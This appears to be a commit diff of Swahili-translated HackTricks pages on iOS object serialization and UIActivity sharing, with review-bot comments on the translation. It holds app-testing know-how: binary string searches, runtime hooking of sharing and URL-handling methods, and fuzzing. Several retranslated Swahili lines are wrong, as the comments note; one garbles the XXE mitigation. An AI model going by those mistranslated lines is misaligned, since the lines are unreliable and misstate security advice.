* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
# Wapelelezi wa Itifaki ya WebView
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
# WebView Protocol Handlers
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
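Review bot: the page title switches from Swahili ("Wapelelezi wa Itifaki ya WebView") to English ("WebView Protocol Handlers") while the support bullets in the same hunk are translated into Swahili, so the language policy for titles is unclear. The old title was itself wrong ("Wapelelezi" means detectives, not handlers), so if titles are meant to stay Swahili a wording such as "Vidhibiti vya Itifaki vya WebView (Protocol Handlers)" would be needed; if titles are meant to stay English across the commit, as "iOS UIActivity Sharing" suggests, that decision should be applied consistently rather than file by file.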

View file

@ -1,25 +1,26 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Msimbo na habari zaidi katika [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence).
Code na maelezo zaidi katika [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence).
## Uundaji wa Vitu katika Maendeleo ya iOS
## Uwekaji wa Vitu katika Maendeleo ya iOS
Katika iOS, **uundaji wa vitu** unahusisha kubadilisha vitu kuwa muundo ambao unaweza kuhifadhiwa au kutumwa kwa urahisi, na kisha kuirudisha kutoka kwenye muundo huu unapohitajika. Itifaki mbili kuu, **`NSCoding`** na **`NSSecureCoding`**, hufanikisha mchakato huu kwa ajili ya darasa la Objective-C au `NSObject` subclasses, kuruhusu vitu kuundwa katika **`NSData`**, muundo ambao unafunga mabufa ya herufi.
Katika iOS, **uwekaji wa vitu** unahusisha kubadilisha vitu kuwa katika muundo ambao unaweza kuhifadhiwa au kuhamishwa kwa urahisi, na kisha kuyajenga tena kutoka katika muundo huu inapohitajika. Protokali mbili kuu, **`NSCoding`** na **`NSSecureCoding`**, zinawezesha mchakato huu kwa ajili ya Objective-C au `NSObject` subclasses, kuruhusu vitu kuwekewa katika **`NSData`**, muundo unaofunga buffer za byte.
### Utekelezaji wa **`NSCoding`**
Ili kutekeleza `NSCoding`, darasa lazima liwe limepokea kutoka kwa `NSObject` au liwe limeandikwa kama `@objc`. Itifaki hii inahitaji utekelezaji wa njia mbili za kuweka na kuondoa mali za kesi:
### **`NSCoding`** Utekelezaji
Ili kutekeleza `NSCoding`, darasa lazima irithi kutoka `NSObject` au iwe imewekwa alama kama `@objc`. Protokali hii inahitaji utekelezaji wa mbinu mbili za kuandika na kusoma mabadiliko ya mfano:
```swift
class CustomPoint: NSObject, NSCoding {
var x: Double = 0.0
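Review bot: "Ili kutekeleza `NSCoding`, darasa lazima irithi kutoka `NSObject`" has a noun-class agreement error ("darasa" takes "li-", so "lazima lirithi"), and "mabadiliko ya mfano" for "instance variables" reads as "changes of the example", losing the meaning; suggest "sifa za kitu (instance variables)". The introductory line "Code na maelezo zaidi katika" also mixes in the English "Code" where the line it replaces had "Msimbo".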
@ -36,8 +37,8 @@ self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name)
}
}
```
### **Kuboresha Usalama na `NSSecureCoding`**
Ili kupunguza udhaifu ambapo wadukuzi wanainjekta data kwenye vitu vilivyoundwa tayari, **`NSSecureCoding`** inatoa itifaki iliyoboreshwa. Darasa zinazofuata `NSSecureCoding` lazima thibitishe aina ya vitu wakati wa kudekodea, kuhakikisha kuwa ni aina za vitu zinazotarajiwa tu zinazotengenezwa. Walakini, ni muhimu kuelewa kuwa wakati `NSSecureCoding` inaboresha usalama wa aina, haifanyi data kuwa siri au kuhakikisha uadilifu wake, hivyo inahitaji hatua za ziada za kulinda habari nyeti:
### **Kuimarisha Usalama kwa `NSSecureCoding`**
Ili kupunguza udhaifu ambapo washambuliaji wanaingiza data kwenye vitu vilivyoundwa tayari, **`NSSecureCoding`** inatoa protokali iliyoboreshwa. Madarasa yanayokubaliana na `NSSecureCoding` yanapaswa kuthibitisha aina ya vitu wakati wa ufafanuzi, kuhakikisha kwamba ni aina za vitu zinazotarajiwa pekee ndizo zinazoanzishwa. Hata hivyo, ni muhimu kutambua kwamba ingawa `NSSecureCoding` inaboresha usalama wa aina, haifanyi usimbaji wa data au kuhakikisha uadilifu wake, hivyo inahitaji hatua za ziada za kulinda taarifa nyeti:
```swift
static var supportsSecureCoding: Bool {
return true
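Review bot: "haifanyi usimbaji wa data au kuhakikisha uadilifu wake" is ambiguous, because "usimbaji" covers both encoding and encryption, and the point of the sentence is precisely that `NSSecureCoding` only checks types and does not encrypt or integrity-protect the archive; suggest "haisimbi data kwa njia fiche (haifanyi encryption) wala kuhakikisha uadilifu wake". Likewise "wakati wa ufafanuzi" (during explanation) for "during decoding" is less clear than the replaced "wakati wa kudekodea".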
@ -45,42 +46,42 @@ return true
let obj = decoder.decodeObject(of: MyClass.self, forKey: "myKey")
```
## Uhifadhi wa Data na `NSKeyedArchiver`
`NSKeyedArchiver` na kifaa chake, `NSKeyedUnarchiver`, inawezesha kuweka alama vitu ndani ya faili na kuvipata baadaye. Mfumo huu ni muhimu kwa ajili ya kudumuisha vitu:
## Data Archiving with `NSKeyedArchiver`
`NSKeyedArchiver` na mwenzake, `NSKeyedUnarchiver`, zinawezesha kuandika vitu kwenye faili na baadaye kuvipata. Mekanism hii ni muhimu kwa kuhifadhi vitu:
```swift
NSKeyedArchiver.archiveRootObject(customPoint, toFile: "/path/to/archive")
let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive") as? CustomPoint
```
### Kutumia `Codable` kwa Ufupishaji wa Ufumaji
Itifaki ya `Codable` ya Swift inaunganisha `Decodable` na `Encodable`, ikirahisisha uwekaji na uondokaji wa vitu kama `String`, `Int`, `Double`, nk., bila jitihada za ziada:
### Using `Codable` for Simplified Serialization
Protokali ya `Codable` ya Swift inachanganya `Decodable` na `Encodable`, ikirahisisha uandishi na usomaji wa vitu kama `String`, `Int`, `Double`, nk, bila juhudi za ziada:
```swift
struct CustomPointStruct: Codable {
var x: Double
var name: String
}
```
Njia hii inasaidia uwekaji wa data kwa njia rahisi kwenye orodha ya mali na JSON, ikiboresha usindikaji wa data kwenye programu za Swift.
Huu njia inasaidia serialization rahisi kutoka na kwenda kwenye orodha za mali na JSON, ikiboresha usimamizi wa data katika programu za Swift.
## Mbadala wa Uwekaji wa JSON na XML
Mbali na msaada wa asili, maktaba kadhaa za watu wa tatu zinatoa uwezo wa uwekaji/utoaji wa JSON na XML, kila moja ikiwa na sifa zake za utendaji na maswala ya usalama. Ni muhimu kuchagua maktaba hizi kwa umakini, hasa kwa kuzingatia kuzuiwa kwa hatari kama mashambulizi ya XXE (XML External Entities) kwa kusanidi wapanguzi ili kuzuia usindikaji wa entiti za nje.
### Maswala ya Usalama
Wakati wa uwekaji wa data, hasa kwenye mfumo wa faili, ni muhimu kuwa macho kuhusu uwezekano wa kuingizwa kwa habari nyeti. Data iliyowekwa, ikiwa itatekwa au kushughulikiwa vibaya, inaweza kufichua programu kwa hatari kama vitendo visivyoruhusiwa au uvujaji wa data. Inapendekezwa kusimbwa na kusaini data iliyowekwa ili kuimarisha usalama.
## Mbadala wa Uandishi wa JSON na XML
Mbali na msaada wa asili, maktaba kadhaa za upande wa tatu zinatoa uwezo wa uandishi/kuandika JSON na XML, kila moja ikiwa na sifa zake za utendaji na maelezo ya usalama. Ni muhimu kuchagua maktaba hizi kwa makini, hasa ili kupunguza udhaifu kama mashambulizi ya XXE (XML External Entities) kwa kuunda waandishi wa habari ili kuzuia usindikaji wa vitu vya nje.
### Maelezo ya Usalama
Wakati wa kuandika data, hasa kwenye mfumo wa faili, ni muhimu kuwa makini kuhusu uwezekano wa kujumuisha taarifa nyeti. Data iliyosajiliwa, ikiwa itakamatwa au kushughulikiwa vibaya, inaweza kufichua programu kwa hatari kama vitendo visivyoidhinishwa au uvujaji wa data. Inapendekezwa kuandika na kusaini data iliyosajiliwa ili kuboresha usalama.
## Marejeo
* [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
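Review bot: the XXE mitigation sentence is broken by the retranslation: "kwa kuunda waandishi wa habari ili kuzuia usindikaji wa vitu vya nje" reads as "by creating journalists to prevent processing of external things", where the replaced line correctly said "kwa kusanidi wapanguzi" (by configuring parsers); the old wording should be kept. The same hunk also turns "encrypt and sign" into "kuandika na kusaini" (write and sign), where the replaced line had "kusimbwa na kusaini"; "Huu njia" should be "Njia hii" as before; "Mekanism hii" is not Swahili ("Utaratibu huu"); and the two headings "Data Archiving with `NSKeyedArchiver`" and "Using `Codable` for Simplified Serialization" are now untranslated while their bodies are in Swahili.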

View file

@ -1,78 +1,80 @@
# Kushiriki UIActivity
# iOS UIActivity Sharing
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Kushiriki UIActivity Imesanifishwa
# UIActivity Sharing Simplified
Tangu iOS 6 kuendelea, programu za watu wa tatu zimezawezeshwa kushiriki data kama vile maandishi, URL, au picha kwa kutumia mifumo kama AirDrop, kama ilivyoelezwa katika [mwongozo wa Mawasiliano ya Programu kwa Programu](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3) wa Apple. Kipengele hiki kinajitokeza kupitia karatasi ya shughuli ya kushiriki ya mfumo ambayo inaonekana baada ya kuingiliana na kifungo cha "Shiriki".
Kuanzia iOS 6 na kuendelea, programu za upande wa tatu zimewezeshwa **kushiriki data** kama vile maandiko, URLs, au picha kwa kutumia mitambo kama AirDrop, kama ilivyoelezwa katika mwongozo wa [Inter-App Communication](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3) wa Apple. Kipengele hiki kinaonekana kupitia _karatasi ya shughuli za kushiriki_ inayojitokeza unaposhughulika na kitufe cha "Share".
Orodha kamili ya chaguzi zote za kushiriki zilizojengwa tayari inapatikana kwenye [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Watengenezaji wanaweza kuchagua kuondoa chaguzi za kushiriki maalum ikiwa wanadhani hazifai kwa maombi yao.
Orodha kamili ya chaguo zote za kushiriki zilizojengwa ndani inapatikana kwenye [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Wataalamu wa programu wanaweza kuchagua kutengwa kwa chaguzi maalum za kushiriki ikiwa wanaona hazifai kwa programu yao.
## **Jinsi ya Kushiriki Data**
Umakini unapaswa kuwekwa kwenye:
Umakini unapaswa kuelekezwa kwa:
- Asili ya data inayoshirikiwa.
- Uingizaji wa shughuli za desturi.
- Aina ya data inayoshirikiwa.
- Kuongeza shughuli za kawaida.
- Kutengwa kwa aina fulani za shughuli.
Kushiriki kunawezeshwa kupitia kuanzisha `UIActivityViewController`, ambapo vitu vilivyokusudiwa kushirikiwa vinapitishwa. Hii inafanikiwa kwa kuita:
Kushiriki kunarahisishwa kupitia uundaji wa `UIActivityViewController`, ambapo vitu vinavyokusudiwa kushirikiwa vinapitishwa. Hii inafanywa kwa kuita:
```bash
$ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
0x1000df034 45 44 initWithActivityItems:applicationActivities:
```
Wabunifu wanapaswa kuchunguza `UIActivityViewController` kwa shughuli na shughuli za desturi ambazo imeanzishwa nazo, pamoja na aina zozote zilizotengwa za shughuli (`excludedActivityTypes`).
Developers should scrutinize the `UIActivityViewController` for the activities and custom activities it's initialized with, as well as any specified `excludedActivityTypes`.
## **Jinsi ya Kupokea Data**
Vipengele vifuatavyo ni muhimu wakati wa kupokea data:
Mambo yafuatayo ni muhimu unapopokea data:
- Tamko la **aina za hati za desturi**.
- Maelezo ya **aina za hati ambazo programu inaweza kufungua**.
- Uhakiki wa **usahihi wa data iliyopokelewa**.
- Tamko la **aina za hati za kawaida**.
- Mwelekeo wa **aina za hati ambazo programu inaweza kufungua**.
- Uthibitisho wa **uaminifu wa data iliyopokelewa**.
Bila kupata nambari ya chanzo, mtu bado anaweza kukagua `Info.plist` kwa funguo kama vile `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, na `CFBundleDocumentTypes` ili kuelewa aina za hati ambazo programu inaweza kushughulikia na kutangaza.
Bila ufikiaji wa msimbo wa chanzo, mtu anaweza bado kuchunguza `Info.plist` kwa funguo kama `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, na `CFBundleDocumentTypes` ili kuelewa aina za hati ambazo programu inaweza kushughulikia na kutangaza.
Mwongozo mfupi juu ya funguo hizi unapatikana kwenye [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), ukionyesha umuhimu wa kutaja na kuagiza UTIs kwa kutambuliwa kwa mfumo kwa ujumla na kuunganisha aina za hati na programu yako kwa ushirikiano katika mazungumzo ya "Fungua Kwa".
Mwongozo mfupi juu ya funguo hizi upatikana kwenye [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), ukisisitiza umuhimu wa kufafanua na kuagiza UTIs kwa kutambuliwa kwa mfumo mzima na kuunganisha aina za hati na programu yako kwa ajili ya ushirikiano katika mazungumzo ya "Fungua na".
## Njia ya Jaribio la Kudumu
## Njia ya Kujaribu ya Kijadi
Kwa kujaribu **shughuli za kutuma**, mtu anaweza:
Ili kujaribu **kutuma shughuli**, mtu anaweza:
- Kuingia kwenye njia ya `init(activityItems:applicationActivities:)` ili kuchukua vitu na shughuli zinazoshirikiwa.
- Kutambua shughuli zilizotengwa kwa kuingilia mali ya `excludedActivityTypes`.
- Kuunganisha kwenye njia ya `init(activityItems:applicationActivities:)` ili kukamata vitu na shughuli zinazoshirikiwa.
- Kutambua shughuli zilizotengwa kwa kukamata mali ya `excludedActivityTypes`.
Kwa **kupokea vitu**, inahusisha:
- Kushiriki faili na programu kutoka chanzo kingine (k.m., AirDrop, barua pepe) ambayo inaleta mazungumzo ya "Fungua na...".
- Kuingia kwenye njia ya `application:openURL:options:` pamoja na njia nyingine zilizotambuliwa wakati wa uchambuzi wa tuli ili kuona jibu la programu.
- Kutumia faili zilizoharibika au mbinu za fuzzing ili kutathmini uimara wa programu.
- Kushiriki faili na programu kutoka chanzo kingine (mfano, AirDrop, barua pepe) inayochochea mazungumzo ya "Fungua na...".
- Kuunganisha `application:openURL:options:` miongoni mwa njia nyingine zilizotambuliwa wakati wa uchambuzi wa statiki ili kuona majibu ya programu.
- Kutumia faili zisizo sahihi au mbinu za fuzzing ili kutathmini uimara wa programu.
## Marejeo
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
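Review bot: the sentence "Developers should scrutinize the `UIActivityViewController` for the activities and custom activities it's initialized with..." replaces a Swahili sentence with untranslated English, which is a regression in a translation commit. The heading "Njia ya Kujaribu ya Kijadi" (traditional testing approach) also misnames the section, whose bullets describe hooking `init(activityItems:applicationActivities:)` and `application:openURL:options:` at runtime in contrast to "uchambuzi wa statiki"; a heading such as "Mbinu ya Kujaribu Wakati wa Utekelezaji (Dynamic Testing)" would fit the content. Minor: "Mwongozo mfupi juu ya funguo hizi upatikana" should be "unapatikana", and "kuchagua kutengwa kwa chaguzi maalum" reads better as "kuchagua kutenga chaguzi maalum".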

View file

@ -1,56 +1,57 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
